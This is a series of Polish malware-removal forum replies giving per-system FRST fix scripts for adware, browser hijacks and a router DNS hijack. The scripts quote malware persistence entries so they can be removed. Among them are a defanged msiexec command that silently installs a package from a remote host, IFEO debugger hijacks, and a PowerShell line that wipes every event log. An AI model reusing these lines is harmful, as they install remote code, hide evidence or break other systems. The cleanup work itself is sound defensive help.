Miszel03

Miałeś niezłego nosa, że założyłeś u nas temat. Adresy serwerów DNS ustawionych na routerze są zagraniczne, konkretnie pochodzą z Belgii (KLIK / KLIK). Z doświadczenia, która niebagatela wynosi już ok. 3 lata wiem, że to adresy infekcyjne i to tym się będziemy zajmować. Wątkiem pobocznym jest sprzątanie systemu z resztek po programach itd. P.S: Czy korzystasz z nieoficjalnych platform Steam? Aktualnie popularne są rozmaite strony dot. CS:GO, darmowe przedmioty, skrzynie i klucze. Wiele takich stron to oszustwo / Phishing, a sama rejestracja może być powiązana z kontem Steam. To stanowi potencjalne zagrożenie. Jeśli tak i nie jesteś ich pewny to zarządzaj kasacji konta. 1. Zaloguj się do routera: Zmień ustawienia DNS. Jeśli nie wiesz na jakie, możesz ustawić adresy Google: 8.8.8.8 + 8.8.4.4 Zabezpiecz router: zmień hasło oraz zamknij dostęp do panelu zarządzania od strony Internetu. Porównaj z tymi artykułami: KLIK, KLIK. Po konfiguracji uruchom ten test mający potwierdzić zabezpieczenie: KLIK. Dopiero gdy router zostanie wyczyszczony i zabezpieczony: 2. Uruchom FRST. Z klawiatury CTRL+Y, zostanie otworzony plik fixlist.txt. Wklej do pliku następującą treść: CloseProcesses: CreateRestorePoint: S3 klids; \??\C:\ProgramData\Kaspersky Lab\AVP16.0.1\Bases\klids.sys [X] CustomCLSID: HKU\S-1-5-21-689077054-4267889677-1268134294-1001_Classes\CLSID\{0E270DAA-1BE6-48F2-AC49-A5541C1C03A3}\InprocServer32 -> %%systemroot%%\system32\shell32.dll => Brak pliku ContextMenuHandlers5: [igfxcui] -> {3AB1675A-CCFF-11D2-8B20-00A0C93CB1F4} => -> Brak pliku Task: {1B826A68-2BFD-486B-B775-CDAEB1CE3B7E} - \Microsoft\Windows\Setup\gwx\refreshgwxconfigandcontent -> Brak pliku Task: {1D7D4060-DAE8-4F05-88FE-05A6FA97A47E} - \Microsoft\Windows\Setup\GWXTriggers\Time-5d -> Brak pliku Task: {280944C5-56A5-4AEC-BA87-45ADC43FB063} - \Microsoft\Windows\Setup\GWXTriggers\MachineUnlock-5d -> Brak pliku Task: {3387189F-AA93-45AE-82F7-728BAA9584C7} - \Microsoft\Windows\Setup\gwx\refreshgwxcontent -> Brak pliku Task: {5AB3FC94-C677-4FD8-BD55-5E866F0BDE89} - \Microsoft\Windows\Setup\GWXTriggers\OutOfIdle-5d -> Brak pliku Task: {62181F62-BCDF-46C4-B2AA-E5813ECFFC97} - \Microsoft\Windows\Setup\gwx\launchtrayprocess -> Brak pliku Task: {6BCC9D5F-B8B6-49C9-9401-B260ACF0280C} - \CCleanerSkipUAC -> Brak pliku Task: {A5658747-E50E-400C-94FF-53EBA4BFDD9C} - \Microsoft\Windows\Setup\GWXTriggers\Logon-5d -> Brak pliku Task: {BAACA7C6-C5F1-4C9B-BB5F-DEEE0D7D2A65} - \Microsoft\Windows\Setup\gwx\refreshgwxconfig -> Brak pliku Task: {D2EC9FF0-07D6-4665-BF8D-515F9E24D0CF} - \Microsoft\Windows\Setup\GWXTriggers\Telemetry-4xd -> Brak pliku Task: {DC8A6D5F-25CB-47FC-8C7D-4C4CCA68EC6D} - \Microsoft\Windows\Setup\GWXTriggers\OutOfSleep-5d -> Brak pliku Task: {E6488BEE-1463-487C-822D-5B2346287339} - \Microsoft\Windows\Setup\GWXTriggers\refreshgwxconfig-B -> Brak pliku C:\Users\Misiek\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu\µTorrent.lnk CMD: netsh advfirewall reset CMD: ipconfig /flushdns Powershell: wevtutil el | Foreach-Object {wevtutil cl "$_"} EmptyTemp: Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Z klawiatury CTRL+S, by zapisać zmiany. Następnie w oknie FRST klik w Napraw (Fix). Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, nastąpi restart systemu. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. 3. Zmień hasło dostępu do konta Steam oraz Email, hasło ma być łatwe do zapamiętania, ale trudne do złamania. Duże, małe litery, znaki specjalne. 4. Zrób nowy log FRST z opcji Skanuj (Scan), wraz z Addition, ale już bez Shortcut. Dołącz też plik fixlog.txt.

Raporty muszą zostać pozyskane z tego samego miejsca co został uruchomiony FRST (czyli bez dat). Te raporty masz z archiwalnego katalogu C:\FRST.

Linki do plików kasuję (są potencjalnie szkodliwe), prześlij mi je w Prywatnej wiadomości na forum. Umieszczanie ich publicznie jest niebezpieczne dla innych użytkowników. Proszę zastosuj się do zasad działu, dodatkowo poproszę o raport z USBFix z opcji Listing oraz Research w momencie, w którym zainfekowany pendrive jest podpięty do komputera. Nie wykonuj żadnych czynności związanych z płatnością online na tym komputerze i nie loguj się do banków itp. usług.

Mało precyzyjne to "Jest lepiej". Zakładam, że problemy infekcyjne ustąpiły, a w takim razie będziemy kończyć. Zastosuj DelFix (kasacja używanych narzędzi) oraz zaktualizuj oprogramowanie zewnętrzne jak i system Windows. Dodatkowo, obowiązkowa lektura będzie - Portale z oprogramowaniem / Instalatory - na co uważać.

Wygląda na to, że wszystko wyczyszczone i system doprowadzony do porządku. Jak podsumowujesz obecną sytuację?

Wszystko pomyślnie wykonane. Infekcje usunięte, teraz sprzątamy szczątki po nich i wdrążamy skan antyadware'owy. 1. Uruchom FRST. Z klawiatury CTRL+Y, zostanie otworzony plik fixlist.txt. Wklej do pliku następującą treść: CloseProcesses: CreateRestorePoint: C:\Program Files (x86)\Firefox C:\Users\media\AppData\Local\Firefox DeleteKey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Doeye DeleteKey: HKEY_USERS\S-1-5-21-204455593-1543837664-2498303104-1001\Software\Doeye DeleteKey: HKEY_USERS\S-1-5-21-204455593-1543837664-2498303104-1001\Software\Microsoft\Internet Explorer\LowRegistry\Audio\PolicyConfig\PropertyStore\dd9b6d08_0 DeleteValue: HKEY_USERS\S-1-5-21-204455593-1543837664-2498303104-1001\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Compatibility Assistant\Store|C:\Program Files (x86)\Doeye\Application\chrome.exe DeleteValue: HKEY_USERS\S-1-5-21-204455593-1543837664-2498303104-1001\Software\Classes\irc\DefaultIcon|C:\Program Files (x86)\Doeye\Application\chrome.exe DeleteValue: HKEY_USERS\S-1-5-21-204455593-1543837664-2498303104-1001\Software\Classes\irc\shell\open\command|C:\Program Files (x86)\Doeye\Application\chrome.exe DeleteValue: HKEY_USERS\S-1-5-21-204455593-1543837664-2498303104-1001\Software\Classes\mailto\DefaultIcon|C:\Program Files (x86)\Doeye\Application\chrome.exe DeleteValue: HKEY_USERS\S-1-5-21-204455593-1543837664-2498303104-1001\Software\Classes\mailto\shell\open\command|C:\Program Files (x86)\Doeye\Application\chrome.exe DeleteValue: HKEY_USERS\S-1-5-21-204455593-1543837664-2498303104-1001\Software\Classes\mms\DefaultIcon|C:\Program Files (x86)\Doeye\Application\chrome.exe DeleteValue: HKEY_USERS\S-1-5-21-204455593-1543837664-2498303104-1001\Software\Classes\mms\shell\open\command|C:\Program Files (x86)\Doeye\Application\chrome.exe DeleteValue: HKEY_USERS\S-1-5-21-204455593-1543837664-2498303104-1001\Software\Classes\news\DefaultIcon|C:\Program Files (x86)\Doeye\Application\chrome.exe DeleteValue: HKEY_USERS\S-1-5-21-204455593-1543837664-2498303104-1001\Software\Classes\news\shell\open\command|C:\Program Files (x86)\Doeye\Application\chrome.exe DeleteValue: HKEY_USERS\S-1-5-21-204455593-1543837664-2498303104-1001\Software\Classes\nntp\DefaultIcon|C:\Program Files (x86)\Doeye\Application\chrome.exe DeleteValue: HKEY_USERS\S-1-5-21-204455593-1543837664-2498303104-1001\Software\Classes\nntp\shell\open\command|C:\Program Files (x86)\Doeye\Application\chrome.exe DeleteValue: HKEY_USERS\S-1-5-21-204455593-1543837664-2498303104-1001\Software\Classes\sms\DefaultIcon|C:\Program Files (x86)\Doeye\Application\chrome.exe DeleteValue: HKEY_USERS\S-1-5-21-204455593-1543837664-2498303104-1001\Software\Classes\sms\shell\open\command|C:\Program Files (x86)\Doeye\Application\chrome.exe DeleteValue: HKEY_USERS\S-1-5-21-204455593-1543837664-2498303104-1001\Software\Classes\smsto\DefaultIcon|C:\Program Files (x86)\Doeye\Application\chrome.exe DeleteValue: HKEY_USERS\S-1-5-21-204455593-1543837664-2498303104-1001\Software\Classes\smsto\shell\open\command|C:\Program Files (x86)\Doeye\Application\chrome.exe DeleteValue: HKEY_USERS\S-1-5-21-204455593-1543837664-2498303104-1001\Software\Classes\urn\DefaultIcon|C:\Program Files (x86)\Doeye\Application\chrome.exe DeleteValue: HKEY_USERS\S-1-5-21-204455593-1543837664-2498303104-1001\Software\Classes\urn\shell\open\command|C:\Program Files (x86)\Doeye\Application\chrome.exe DeleteValue: HKEY_USERS\S-1-5-21-204455593-1543837664-2498303104-1001\Software\Classes\webcal\DefaultIcon|C:\Program Files (x86)\Doeye\Application\chrome.exe DeleteValue: HKEY_USERS\S-1-5-21-204455593-1543837664-2498303104-1001\Software\Classes\webcal\shell\open\command|C:\Program Files (x86)\Doeye\Application\chrome.exe Toolbar: HKU\S-1-5-21-204455593-1543837664-2498303104-1001 -> Brak nazwy - {2318C2B1-4965-11D4-9B18-009027A5CD4F} - Brak pliku S1 iSafeKrnlMon; \??\C:\Program Files (x86)\Elex-tech\YAC\iSafeKrnlMon.sys [X] FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.33.5\npGoogleUpdate3.dll [2017-09-21] (Google Inc.) FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.33.5\npGoogleUpdate3.dll [2017-09-21] (Google Inc.) CHR HKLM-x32\...\Chrome\Extension: [eofcbnmajmjmplflapaojjnihcjkigck] - C:\Program Files\AVAST Software\Avast\WebRep\Chrome\aswWebRepChromeSp.crx CHR HKLM-x32\...\Chrome\Extension: [gomekmidlodglbbmalcneegieacbdmki] - C:\Program Files\AVAST Software\Avast\WebRep\Chrome\aswWebRepChrome.crx EmptyTemp: Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Z klawiatury CTRL+S, by zapisać zmiany. Następnie w oknie FRST klik w Napraw (Fix). Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, nastąpi restart systemu. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. 2. Zrób raport AdwCleaner z opcji Skanuj, nie stosuj jeszcze Oczyść. Raport zaprezentuj na forum. 3. Dostarcz plik Fixlog.

Nie ma problemu, jak mi się uda to zrobię bardziej szczegółowo co i jak. Pozdrawiam!

System jest zainfekowany infekcją adware Albireo. W przeglądarka Google Chrome i Mozilla FireFox zainstalowane są rozszerzenia adware, w CHR jest mniej modyfikacji, natomiast w FF zainfekowane są wszystkie profile i wygląda również na to, że preferencję, więc w przypadku tej przeglądarki wdrożymy kompleksowe wymiany profili (kasacja wszelkich danych z przeglądarki, więc jeśli potrzebujesz to zrób ich kopie). Dodatkowo w celu rozszerzenia diagnostyki poproszę o raporty z działu Hardware (CrystalDiskInfo). 1. Uruchom FRST. Z klawiatury CTRL+Y, zostanie otworzony plik fixlist.txt. Wklej do pliku następującą treść: CloseProcesses: CreateRestorePoint: ShellIconOverlayIdentifiers: [00avg] -> {472083B0-C522-11CF-8763-00608CC02F24} => -> Brak pliku ContextMenuHandlers3: [00avg] -> {472083B0-C522-11CF-8763-00608CC02F24} => -> Brak pliku ContextMenuHandlers5: [Gadgets] -> {6B9228DA-9C15-419e-856C-19E768A13BDC} => -> Brak pliku Task: {02E09A4E-3202-4D4F-A240-2444B4276C45} - \Microsoft\Windows\Setup\GWXTriggers\ScheduleUpgradeTime -> Brak pliku Task: {32F5F017-5727-4C2E-9EA8-F12C3C72DB91} - \Microsoft\Windows\Setup\gwx\refreshgwxcontent -> Brak pliku Task: {392D98DD-C171-4049-A5C3-F6CA567BA7C9} - \Microsoft\Windows\Setup\GWXTriggers\OnIdle-5d -> Brak pliku Task: {3C2F4685-317D-4754-A5B0-D5D16E005651} - \Microsoft\Windows\Setup\GWXTriggers\ScheduleUpgradeReminderTime -> Brak pliku Task: {411A9972-7599-46BD-B9FF-17A3BE022E86} - \Microsoft\Windows\Setup\gwx\refreshgwxconfig -> Brak pliku Task: {58656D58-9C8D-4948-8425-C83BCAFF9A8A} - \Microsoft\Windows\Setup\GWXTriggers\refreshgwxconfig-B -> Brak pliku Task: {5A246FB1-C54F-4940-994E-22C12BD8DF4A} - \Microsoft\Windows\Setup\gwx\launchtrayprocess -> Brak pliku Task: {8525F03E-667B-4714-BD45-772312D7C62B} - \Microsoft\Windows\Setup\GWXTriggers\OutOfSleep-5d -> Brak pliku Task: {85F78EC4-066A-46A6-94A6-268ED8E40EE6} - \Microsoft\Windows\Setup\GWXTriggers\Logon-5d -> Brak pliku Task: {C64BD4B9-F901-47B6-90EF-5920D1626033} - \Microsoft\Windows\Setup\GWXTriggers\MachineUnlock-5d -> Brak pliku Task: {D1704B6A-8C32-4189-B4E0-78EA1FCC5B6C} - \Microsoft\Windows\Setup\GWXTriggers\OutOfIdle-5d -> Brak pliku Task: {FA0AFABF-14D7-4283-ABCD-AE71AB849CC5} - \Microsoft\Windows\Setup\gwx\refreshgwxconfigandcontent -> Brak pliku Task: {FBF5DC86-BB08-4694-AD77-5F3E05F47DC5} - \Microsoft\Windows\Setup\GWXTriggers\Time-5d -> Brak pliku AppInit_DLLs: C:\ProgramData\Quotenamron\Holdkayin.dll => Brak pliku C:\ProgramData\Quotenamron SearchScopes: HKLM-x32 -> DefaultScope {ielnksrch} URL = BHO: Brak nazwy -> {602ADB0E-4AFF-4217-8AA1-95DAC4DFA408} -> Brak pliku BHO-x32: Brak nazwy -> {602ADB0E-4AFF-4217-8AA1-95DAC4DFA408} -> Brak pliku U3 idsvc; Brak ImagePath S3 NTIOLib_OCKit_MB; \??\C:\Program Files (x86)\MSI\MSI OC Kit\Driver_Service\NTIOLib_X64.sys [X] U3 pwddypoc; \??\C:\Users\Mateusz\AppData\Lo cal\Temp\pwddypoc.sys [X] 2016-07-10 16:19 - 2016-07-10 16:19 - 006870016 _____ () C:\Users\Mateusz\AppData\Roaming\agent.dat 2016-07-10 16:19 - 2016-07-10 16:19 - 000067968 _____ () C:\Users\Mateusz\AppData\Roaming\Config.xml 2016-07-10 16:19 - 2016-07-10 16:19 - 000014448 _____ () C:\Users\Mateusz\AppData\Roaming\InstallationConfiguration.xml 2016-07-10 16:19 - 2016-07-10 16:19 - 000128512 _____ () C:\Users\Mateusz\AppData\Roaming\Installer.dat 2016-07-10 16:19 - 2016-07-10 16:19 - 000018432 _____ () C:\Users\Mateusz\AppData\Roaming\Main.dat 2016-07-10 16:19 - 2016-07-10 16:19 - 000005568 _____ () C:\Users\Mateusz\AppData\Roaming\md.xml 2016-07-10 16:19 - 2016-07-10 16:19 - 000126464 _____ () C:\Users\Mateusz\AppData\Roaming\noah.dat 2016-07-10 16:19 - 2016-07-10 16:19 - 000032038 _____ () C:\Users\Mateusz\AppData\Roaming\uninstall_temp.ico 2016-07-10 16:19 - 2016-07-10 16:19 - 001760781 _____ () C:\Users\Mateusz\AppData\Roaming\Zoowarm.tst C:\ProgramData\Microsoft\Windows\Start Menu\Programs\VEGAS\VEGAS Pro 14.0\VEGAS Pro 14.0 Readme.lnk C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Sophos\Sophos Anti-Rootkit\Release notes.lnk C:\Users\Mateusz\Desktop\karta pracy.lnk C:\Users\Mateusz\Desktop\Programy\Fraps.lnk C:\Users\Mateusz\Desktop\Programy\Killer Network Manager.lnk C:\Users\Mateusz\Desktop\Programy\MailShare.lnk C:\Users\Mateusz\Desktop\Programy\MSI® Intel® Extreme Tuning Utility.lnk C:\Users\Mateusz\Desktop\Programy\Norton Product Installer.lnk C:\Users\Mateusz\Desktop\Programy\Norton Security Scan.LNK CMD: netsh advfirewall reset Powershell: wevtutil el | Foreach-Object {wevtutil cl "$_"} EmptyTemp: Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Z klawiatury CTRL+S, by zapisać zmiany. Następnie w oknie FRST klik w Napraw (Fix). Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, nastąpi restart systemu. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. 2. Wyczyść przeglądarkę Google Chrome: Zresetuj synchronizację (o ile włączona): KLIK. Ustawienia > karta Rozszerzenia > odinstaluj adware SafeFinder Search oraz wszystkie nieznane i niepotrzebne Ci rozszerzenia. Ustawienia > karta Ustawienia > Pokaż ustawienia zaawansowane > zjedź na sam spód i uruchom opcję Resetowanie ustawień. Zakładki i hasła nie zostaną naruszone. Ustawienia > karta Ustawienia > sekcja Szukaj > klik w Zarządzanie wyszukiwarkami > skasuj z listy wszystko z wyjątkiem Google. 3. Kliknij klawisz z flagą Windows + R > wklej komendę "C:\Program files (x86)\Mozilla Firefox\firefox.exe" -p > załóż nowy profil, wszystkie poprzednie skasuj. 4. Uruchom AdwCleaner z opcji Skanuj (nie stosuj Oczyść). Po zakończeniu zadania wydobądź raport znajdujący się w C:\AdwCleaner. 5. Zrób nowy log FRST z opcji Skanuj (Scan) wraz z Addition, ale już bez Shortcut. Dołącz też plik fixlog.txt.

Nie usuwamy tematów na forum. Ten mogę jedynie zamknąć i to robię, a jeśli chodzi o Twój nowy temat to postaramy się przetworzyć go jak najszybciej.

Pomyślnie wykonane. Wolę nie widzieć drugi raz raportów z Twojego system tym tym dziale, więc stosuj się do lektury, którą podałem

Przepraszam za brak dalszej instrukcji dot. pkt. 1. Dzięki Rucek za interwencję. Posty poprawiam. Całość została pomyślnie wykonana i system został doprowadzony do porządku. Proszę powiedz mi jak ma się do tego aktualny stan systemu. Wykonaj raport z Hardware - tutaj masz konkretny temat dot. tego zagadnienia (raport z CrystalDiskInfo).

Cóż...system jest kolosalnie zainfekowany. Infekcję są nowoczesne i nakładają silne modyfikacje, ale spokojnie poradzimy sobie. W tym podejściu kasuję kilka infekcji w całości i pobieram więcej danych w celu niwelacji innych. Oprócz tego: sprzątam system, kasuję resztki po programach, martwe wpisy oraz puste skróty. 1. Deinstalacje Za pomocą Program Install and Uninstall Troubleshooter odinstaluj adware / PUP: AlphaGo. Przez Panel Sterowania odinstaluj adware / fałszywe oprogramowanie: Booking.com version 1.3.0.5019, YAC(Yet Another Cleaner!). 2. Uruchom FRST. Z klawiatury CTRL+Y, zostanie otworzony plik fixlist.txt. Wklej do pliku następującą treść: CloseProcesses: CreateRestorePoint: HKU\S-1-5-21-204455593-1543837664-2498303104-1001\...\ChromeHTML: -> "C:\Program Files (x86)\Doeye\Application\chrome.exe" "%1" Task: {2431548D-8098-462D-B275-F2D973A589D2} - System32\Tasks\CreateChoiceProcessTask => C:\Windows\BrowserChoice\browserchoice.exe C:\Program Files (x86)\Doeye C:\Users\media\AppData\Roaming\Doeye C:\Users\media\AppData\Local\Doeye HKU\S-1-5-21-204455593-1543837664-2498303104-1001\...\Run: [background_fault] => C:\Users\media\AppData\Local\background_fault\aswRD.exe [1419576 2017-05-27] (AVAST Software) HKU\S-1-5-21-204455593-1543837664-2498303104-1001\...\Policies\system: [shell] explorer.exe,msiexec.exe /i hxxp://point.ltdmsjq.com/?data=zDlkMj8xFkEdFUM8NkVLNTF1MYUdRWZSOWM3RYYxOUUyFTY1RH== /q C:\Users\media\AppData\Local\background_fault IFEO\GoogleUpdate.exe: [Debugger] 324095823984.exe IFEO\GoogleUpdaterService.exe: [Debugger] 8736459873644.exe IFEO\taskmgr.exe: [Debugger] HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.ourluckysites.com/?type=hp&ts=1492615606&z=89b2548e3c8f5097e107c97gbz4teofqeg7w2q2e8z&from=che0812&uid=SAMSUNGXMZMTD128HAFV-000_S15MNYBD726571 HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.ourluckysites.com/?type=hp&ts=1492615606&z=89b2548e3c8f5097e107c97gbz4teofqeg7w2q2e8z&from=che0812&uid=SAMSUNGXMZMTD128HAFV-000_S15MNYBD726571 HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.ourluckysites.com/search/?type=ds&ts=1492615606&z=89b2548e3c8f5097e107c97gbz4teofqeg7w2q2e8z&from=che0812&uid=SAMSUNGXMZMTD128HAFV-000_S15MNYBD726571&q={searchTerms} HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.ourluckysites.com/search/?type=ds&ts=1492615606&z=89b2548e3c8f5097e107c97gbz4teofqeg7w2q2e8z&from=che0812&uid=SAMSUNGXMZMTD128HAFV-000_S15MNYBD726571&q={searchTerms} HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.ourluckysites.com/?type=hp&ts=1492615606&z=89b2548e3c8f5097e107c97gbz4teofqeg7w2q2e8z&from=che0812&uid=SAMSUNGXMZMTD128HAFV-000_S15MNYBD726571 HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.ourluckysites.com/?type=hp&ts=1492615606&z=89b2548e3c8f5097e107c97gbz4teofqeg7w2q2e8z&from=che0812&uid=SAMSUNGXMZMTD128HAFV-000_S15MNYBD726571 HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxp://www.ourluckysites.com/search/?type=ds&ts=1492615606&z=89b2548e3c8f5097e107c97gbz4teofqeg7w2q2e8z&from=che0812&uid=SAMSUNGXMZMTD128HAFV-000_S15MNYBD726571&q={searchTerms} HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxp://www.ourluckysites.com/search/?type=ds&ts=1492615606&z=89b2548e3c8f5097e107c97gbz4teofqeg7w2q2e8z&from=che0812&uid=SAMSUNGXMZMTD128HAFV-000_S15MNYBD726571&q={searchTerms} HKU\S-1-5-21-204455593-1543837664-2498303104-1001\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.ourluckysites.com/?type=hp&ts=1492615606&z=89b2548e3c8f5097e107c97gbz4teofqeg7w2q2e8z&from=che0812&uid=SAMSUNGXMZMTD128HAFV-000_S15MNYBD726571 HKU\S-1-5-21-204455593-1543837664-2498303104-1001\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.ourluckysites.com/?type=hp&ts=1492615606&z=89b2548e3c8f5097e107c97gbz4teofqeg7w2q2e8z&from=che0812&uid=SAMSUNGXMZMTD128HAFV-000_S15MNYBD726571 SearchScopes: HKLM -> DefaultScope {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = SearchScopes: HKLM -> {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = SearchScopes: HKLM-x32 -> DefaultScope {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = SearchScopes: HKLM-x32 -> {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = SearchScopes: HKU\S-1-5-21-204455593-1543837664-2498303104-1001 -> {306586E7-F494-4E28-96D7-E8E9E9F6C4E5} URL = SearchScopes: HKU\S-1-5-21-204455593-1543837664-2498303104-1001 -> {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = HKU\S-1-5-21-204455593-1543837664-2498303104-1001\...\StartMenuInternet\ChromeHTML: -> C:\Program Files (x86)\Doeye\Application\chrome.exe S2 EastnessSU; "C:\Users\media\AppData\Local\Temp\f1510.tmp\BaofengUpdate_U.exe" /i [X] S3 iSafeKrnlBoot; system32\DRIVERS\iSafeKrnlBoot.sys [X] S1 iSafeNetFilter; system32\DRIVERS\iSafeNetFilter.sys [X] C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Firefox.lnk C:\Users\media\AppData\Local\Microsoft\Windows\Application Shortcuts\SAMSUNGELECTRONICSCO.LTD.SamsungStory_3c1yjt4zspk6g\App.lnk C:\Users\media\AppData\Local\Microsoft\Windows\Application Shortcuts\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\Microsoft.WindowsLive.Calendar.lnk C:\Users\media\AppData\Local\Microsoft\Windows\Application Shortcuts\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\Microsoft.WindowsLive.Mail.lnk C:\Users\media\AppData\Local\Microsoft\Windows\Application Shortcuts\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\Microsoft.WindowsLive.People.lnk C:\Users\media\AppData\Local\Microsoft\Windows\Application Shortcuts\A0762F4C.tvnplayer_h009t4rdk3q9m\App.lnk C:\Users\media\AppData\Local\Microsoft\Windows\Application Shortcuts\8A47CE85.SPlayer_8qmkzsjdagxzj\TMTMetroApp.lnk DeleteKey: HKCU\Software\Mozilla DeleteKey: HKCU\Software\MozillaPlugins DeleteKey: HKLM\SOFTWARE\Mozilla DeleteKey: HKLM\SOFTWARE\MozillaPlugins DeleteKey: HKLM\SOFTWARE\Wow6432Node\Mozilla DeleteKey: HKLM\SOFTWARE\Wow6432Node\mozilla.org DeleteKey: HKLM\SOFTWARE\Wow6432Node\MozillaPlugins C:\Users\media\AppData\Local\Mozilla C:\Users\media\AppData\Roaming\Mozilla C:\Users\media\AppData\Roaming\Profiles C:\Program Files (x86)\Mozilla Firefox C:\ProgramData\Mozilla CMD: dir /a "C:\Program Files" CMD: dir /a "C:\Program Files (x86)" CMD: dir /a "C:\Program Files\Common Files\System" CMD: dir /a "C:\Program Files (x86)\Common Files\System" CMD: dir /a C:\ProgramData CMD: dir /a C:\Users\media\AppData\Local CMD: dir /a C:\Users\media\AppData\LocalLow CMD: dir /a C:\Users\media\AppData\Roaming CMD: netsh advfirewall reset Powershell: wevtutil el | Foreach-Object {wevtutil cl "$_"} Hosts: EmptyTemp: Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Z klawiatury CTRL+S, by zapisać zmiany. Następnie w oknie FRST klik w Napraw (Fix). Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, nastąpi restart systemu. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. 3. Przeglądarka Google Chrome jest silnie zainfekowana i zaistniała konieczność jej kompleksowej reinstalacji. Upewnij się, że nie masz włączonej synchronizacji, która załaduje złe ustawienia z serwera po reinstalacji przeglądarki: KLIK. Jeśli potrzebne, wyeksportuj zakładki: CTRL+SHIFT+O > Organizuj > Eksportuj zakładki do pliku HTML. Odinstaluj Google Chrome. Przy deinstalacji zaznacz Usuń także dane przeglądarki. Zainstaluj najnowszą stabilną wersję Google Chrome: KLIK. Koniecznie ustaw przeglądarkę Google Chrome jako domyślną, to musi być zrobione w celu niwelacji ustawień infekcji. 4. Uruchom FRST, w polu Szukaj (Search) wklej poniższą frazę i kliknij w Szukaj w rejestrze (Search Registry). doeye Obok FRST powstanie raport SearchReg.txt - zaprezentuj go na forum. 5. Zrób nowy log FRST z opcji Skanuj (Scan), wraz z Addition, ale już bez Shortcut. Dołącz też plik fixlog.txt.

Miło mi to słyszeć. W takim razie będziemy kończyć. Zastosuj DelFix (kasacja używanych narzędzi) oraz zaktualizuj oprogramowanie zewnętrzne jak i system Windows. Dodatkowo, obowiązkowa lektura będzie - Portale z oprogramowaniem / Instalatory - na co uważać.

A gdzie raport z Hardware, o które prosiłem? Reszta pomyślnie wykonana. Ad. 1 Hm...powiem tak: to dziwne, bo nic tutaj nie było robione pod tym względem. Mam nadzieję, że to nie efekt Placebo. W każdym razie się cieszę z poprawy! Ad. 2 Jeśli masz możliwość wpłacenia dotacji to zapraszam: KLIK. W imieniu całego zespołu Fixitpc z góry wielkie podziękowania.

W systemie widać, że infekcja adware integruję w uruchamianie się przeglądarki. Koryguję to, a przy okazji czyszczę całą gałąź Dziennika Zdarzeń (to pokaże najświeższe dane z wydarzeń w systemie co przyda się w diagnostyce powolnej pracy systemu), kasuję martwe wpisy i puste skróty. Dodatkowo poproszę o raporty wymagane przez dział Hardware w celu diagnostyki sprzętu (raport z CrystalDiskInfo). 1. Uruchom FRST. Z klawiatury CTRL+Y, zostanie otworzony plik fixlist.txt. Wklej do pliku następującą treść: CloseProcesses: CreateRestorePoint: ContextMenuHandlers1: [ANotepad++64] -> {B298D29A-A6ED-11DE-BA8C-A68E55D89593} => -> Brak pliku ContextMenuHandlers3: [{4A7C4306-57E0-4C0C-83A9-78C1528F618C}] -> {4A7C4306-57E0-4C0C-83A9-78C1528F618C} => -> Brak pliku ContextMenuHandlers1: [7-Zip] -> {23170F69-40C1-278A-1000-000100020000} => -> Brak pliku ContextMenuHandlers4: [7-Zip] -> {23170F69-40C1-278A-1000-000100020000} => -> Brak pliku ContextMenuHandlers4: [Offline Files] -> {474C98EE-CF3D-41f5-80E3-4AAB0AB04301} => -> Brak pliku ContextMenuHandlers6: [Offline Files] -> {474C98EE-CF3D-41f5-80E3-4AAB0AB04301} => -> Brak pliku ContextMenuHandlers5: [igfxcui] -> {3AB1675A-CCFF-11D2-8B20-00A0C93CB1F4} => -> Brak pliku Task: {080C66FE-0B42-4A16-A22C-EE827DEF3BF2} - \Microsoft\Windows\Setup\GWXTriggers\MachineUnlock-5d -> Brak pliku Task: {219975F6-D68A-4960-BCF5-EBE86E0BCFE6} - \Microsoft\Windows\Setup\GWXTriggers\Time-5d -> Brak pliku Task: {2A7F362B-5F77-47A6-89B8-E1383444266D} - \Microsoft\Windows\Setup\gwx\refreshgwxconfig -> Brak pliku Task: {3F215D8C-04C8-4121-AB31-E2BBF0D66A98} - 